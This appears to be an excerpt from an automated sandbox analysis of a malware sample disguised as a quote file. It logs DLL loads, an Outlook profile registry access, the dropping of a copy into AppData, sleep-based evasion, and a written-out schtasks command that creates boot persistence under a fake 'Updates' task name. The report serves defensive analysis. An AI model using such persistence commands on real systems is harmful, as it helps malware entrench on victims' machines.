                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
                Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Section loaded: rasapi32.dll
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Section loaded: rasman.dll
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Section loaded: rtutils.dll
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Section loaded: mswsock.dll
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Section loaded: winhttp.dll
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Section loaded: dhcpcsvc6.dll
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Section loaded: dhcpcsvc.dll
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Section loaded: dnsapi.dll
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Section loaded: winnsi.dll
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Section loaded: fwpuclnt.dll
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Section loaded: secur32.dll
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Section loaded: schannel.dll
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Section loaded: mskeyprotect.dll
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Section loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Section loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Section loaded: ncryptsslp.dll
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Section loaded: dpapi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: windowscodecs.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: amsi.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: userenv.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: dwrite.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: propsys.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: edputil.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: urlmon.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: iertutil.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: srvcli.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: netutils.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: wintypes.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: appresolver.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: bcp47langs.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: slc.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: sppc.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
                Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: rasapi32.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: rasman.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: rtutils.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: mswsock.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: winhttp.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: dhcpcsvc6.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: dhcpcsvc.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: winnsi.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: fwpuclnt.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: secur32.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: schannel.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: mskeyprotect.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: ntasn1.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: ncryptsslp.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Section loaded: dpapi.dll
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: Window Recorder | Window detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: Quote_items1&2.bat.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Quote_items1&2.bat.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
                Source: Quote_items1&2.bat.exe | Static PE information: Image base 0x140000000 > 0x60000000
                Source: Quote_items1&2.bat.exe | Static file information: File size 1113600 > 1048576
                Source: Quote_items1&2.bat.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x10d400
                Source: Quote_items1&2.bat.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Quote_items1&2.bat.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: System.Windows.Forms.pdb source: Quote_items1&2.bat.exe, 00000000.00000002.2323496123.000000000125F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Windows.Forms.pdbt source: Quote_items1&2.bat.exe, 00000000.00000002.2323496123.000000000125F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: uyCa.pdb% source: Quote_items1&2.bat.exe, 00000000.00000002.2333448655.000000001C83A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: uyCa.pdbSHA256: source: Quote_items1&2.bat.exe, wJFLKBSbTtvP.exe.0.dr
                Source: Binary string: .Forms.pdb source: Quote_items1&2.bat.exe, 00000000.00000002.2333448655.000000001C83A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: uyCa.pdb source: Quote_items1&2.bat.exe, wJFLKBSbTtvP.exe.0.dr
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Code function: 0_2_00007FFD344E00BD pushad ; iretd 0_2_00007FFD344E00C1
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Code function: 10_2_00007FFD34500D28 push es; ret 10_2_00007FFD34500D27
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Code function: 10_2_00007FFD34500CDC push es; ret 10_2_00007FFD34500D27
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Code function: 10_2_00007FFD34500C90 push edx; ret 10_2_00007FFD34500CDB
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Code function: 10_2_00007FFD345000BD pushad ; iretd 10_2_00007FFD345000C1
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Code function: 10_2_00007FFD34511078 push eax; retf 10_2_00007FFD34511079
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Code function: 12_2_00007FFD345000BD pushad ; iretd 12_2_00007FFD345000C1
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Code function: 15_2_00007FFD34510D28 push es; ret 15_2_00007FFD34510D27
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Code function: 15_2_00007FFD34510CDC push es; ret 15_2_00007FFD34510D27
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Code function: 15_2_00007FFD34510C90 push edx; ret 15_2_00007FFD34510CDB
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Code function: 15_2_00007FFD345100BD pushad ; iretd 15_2_00007FFD345100C1
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe | Code function: 15_2_00007FFD34521078 push eax; retf 15_2_00007FFD34521079
                Source: Quote_items1&2.bat.exe | Static PE information: section name: .text entropy: 7.790391261864803
                Source: wJFLKBSbTtvP.exe.0.dr | Static PE information: section name: .text entropy: 7.790391261864803
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | File created: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe

                Boot Survival

                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wJFLKBSbTtvP" /XML "C:\Users\user\AppData\Local\Temp\tmpC8F3.tmp"

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe Memory allocated: 1050000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe Memory allocated: 1BBF0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe Memory allocated: EE0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe Memory allocated: 1B1D0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe Memory allocated: 3270000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe Memory allocated: 1B7F0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe Memory allocated: 13C0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe Memory allocated: 1B220000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe Code function: 12_2_00007FFD3450000A sgdt fword ptr [eax]
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeThread delayed: delay time: 600000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6583Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3205Jump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe TID: 1396Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3500Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exe TID: 7264Thread sleep time: -922337203685477s >= -30000sJump to behavior
